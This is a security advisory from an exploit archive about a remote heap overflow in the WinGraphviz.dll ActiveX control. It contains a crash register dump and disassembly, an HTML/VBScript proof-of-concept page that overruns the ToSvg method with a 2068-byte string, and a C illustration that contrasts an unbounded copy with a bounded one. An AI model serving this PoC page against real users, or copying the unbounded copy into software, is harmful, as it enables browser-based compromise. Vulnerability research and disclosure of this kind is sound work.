WinGraphviz Remote Heap Overflow PoC

2012-07-16 / 2012-07-25
Credit: coolkaveh
Risk: High
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-119

Exploit Title: WinGraphviz.dll Remote Heap Overflow PoC
Date: July 15, 2012
Author: coolkaveh coolkaveh@rocketmail.com
https://twitter.com/coolkaveh
Vendor Homepage: http://www.beyondsecurity.com/
Version: 3.5.6
Tested on: Windows 7 SP1

Exploiting the Exploiters
What kind of crappy fuzzer is that?

========
Registers:
--------------------------------------------------------------------------
EIP 01637FFB
EAX 41414141
EBX 01630000 -> 00905A4D -> Asc: MZMZ
ECX 016FF838 -> Asc: AAAAAAAAAAAAAAAAAAAA@AAAAAAAAAAAAAAAAAAAAAAAAAAAAA
EDX 41414141
EDI 00000000
ESI 00000000
EBP 0013FD24 -> 0013FD34
ESP 0013FD10 -> 0013FD34

Block Disassembly:
--------------------------------------------------------------------------
1637FE9 CMP DWORD PTR [EAX+10],0
1637FED JE SHORT 01638042
1637FEF MOV ECX,[EBP+8]
1637FF2 MOV EDX,[ECX+10]
1637FF5 MOV [EBP-4],EDX
1637FF8 MOV EAX,[EBP-4]
1637FFB CMP DWORD PTR [EAX],0      <--- CRASH
1637FFE JE SHORT 01638042
1638000 MOV ECX,[EBP-4]
1638003 CMP DWORD PTR [ECX+10],0
1638007 JE SHORT 0163801B
1638009 MOV EDX,[EBP-4]
163800C MOV EAX,[EDX+10]
163800F MOV ECX,[EBP-4]
1638012 MOV EDX,[ECX+10]

ArgDump:
----------------------------------------------------------------------------
EBP+8  016FF838 -> Asc: AAAAAAAAAAAAAAAAAAAA@AAAAAAAAAAAAAAAAAAAAAAAAAAAAA
EBP+12 016FF838 -> Asc: AAAAAAAAAAAAAAAAAAAA@AAAAAAAAAAAAAAAAAAAAAAAAAAAAA
============================================================================

What the dump shows: the object passed in at [EBP+8] has already been filled with the attacker's 'A' bytes, the code loads a pointer from offset +0x10 of that object (MOV EDX,[ECX+10]) and gets EAX = 41414141, and the CMP DWORD PTR [EAX],0 at 01637FFB then faults on the controlled pointer. A 2068-byte string handed to ToSvg is enough to overrun the heap object and clobber that pointer field (CWE-119).

<html>
Test Exploit page
<object classid='clsid:684811FB-0523-420F-9E8F-A5452C65A19C' id='fuzzer' ></object>
<script language='vbscript'>
arg1=String(2068, "A")
fuzzer.ToSvg arg1
</script>
</html>
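The following C program is an added illustration of the failure mode in the dump above; it is not WinGraphviz's code. It models a heap object whose fixed-size label is followed, at offset 0x10 like the [ECX+10] load in the crash, by a pointer that later code walks. The struct layout, the function names (set_label_vuln, set_label_safe, run_variant) and the 2068-byte 'A' input are assumptions chosen to mirror the PoC; the object is placed at the head of a larger slab so the overrun stays inside memory the demo owns, and the clobbered pointer is inspected rather than dereferenced, which is where the real DLL faults.

```c
#include <stddef.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define LABEL_MAX 16      /* fixed copy target; next pointer lands at +0x10 */
#define SLAB_SIZE 4096    /* demo-only: room for the overrun to stay in-bounds */

/* Hypothetical heap object, not WinGraphviz's real layout: a bounded label
 * followed by a pointer that rendering code dereferences afterwards. */
struct svg_ctx {
    char label[LABEL_MAX];
    struct svg_ctx *next;   /* offset 0x10 on both 32- and 64-bit builds */
};

/* Allocate the object at the start of a zeroed slab, so writes past the
 * label clobber ->next first and then only bytes this demo owns. */
static struct svg_ctx *ctx_new(void)
{
    return calloc(1, SLAB_SIZE);
}

/* Vulnerable variant: copies the whole argument into the 16-byte label
 * with no length check, the behaviour the ToSvg crash points at. The one
 * guard below is demo-only (keeps the copy inside the slab); the real bug
 * has no bound at all. */
static int set_label_vuln(struct svg_ctx *ctx, const char *s)
{
    size_t n = strlen(s);
    char *dst = (char *)ctx + offsetof(struct svg_ctx, label);
    if (n + 1 > SLAB_SIZE - offsetof(struct svg_ctx, label))
        return -1;
    memcpy(dst, s, n + 1);
    return 0;
}

/* Hardened variant: reject anything that does not fit, including the NUL,
 * so the neighbouring pointer is never touched. */
static int set_label_safe(struct svg_ctx *ctx, const char *s)
{
    size_t n = strlen(s);
    if (n >= LABEL_MAX)
        return -1;
    memcpy(ctx->label, s, n + 1);
    return 0;
}

/* Returns 1 when every byte of ctx->next equals the fill byte: the state
 * in which the DLL reaches CMP DWORD PTR [EAX],0 with EAX = 41414141.
 * The pointer is examined as raw bytes and never dereferenced. */
static int next_ptr_clobbered(const struct svg_ctx *ctx, unsigned char fill)
{
    unsigned char raw[sizeof ctx->next];
    memcpy(raw, &ctx->next, sizeof raw);
    for (size_t i = 0; i < sizeof raw; i++)
        if (raw[i] != fill)
            return 0;
    return 1;
}

/* Constructed input matching the PoC's String(2068, "A"). */
static char *make_poc_arg(size_t len, char fill)
{
    char *s = malloc(len + 1);
    if (!s)
        return NULL;
    memset(s, fill, len);
    s[len] = '\0';
    return s;
}

/* Drive one copy variant with a len-byte 'A' string; returns 1 if the
 * pointer field was overwritten, 0 if it survived intact. */
static int run_variant(int (*setter)(struct svg_ctx *, const char *), size_t len)
{
    struct svg_ctx *ctx = ctx_new();
    char *arg = make_poc_arg(len, 'A');
    int clobbered = 0;

    if (ctx && arg) {
        setter(ctx, arg);
        clobbered = next_ptr_clobbered(ctx, 'A');
    }
    free(arg);
    free(ctx);
    return clobbered;
}

int main(void)
{
    printf("unbounded copy, 2068 bytes: next pointer clobbered = %d\n",
           run_variant(set_label_vuln, 2068));
    printf("bounded copy,   2068 bytes: next pointer clobbered = %d\n",
           run_variant(set_label_safe, 2068));
    printf("unbounded copy,    8 bytes: next pointer clobbered = %d\n",
           run_variant(set_label_vuln, 8));
    return 0;
}
```

The point of the bounded variant is that the length check happens before any byte is written: a check that runs after a partial copy, or one that only looks at the destination size without the terminator, still lets the pointer at +0x10 be overwritten.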

References:

http://www.beyondsecurity.com/


Copyright 2024, cxsecurity.com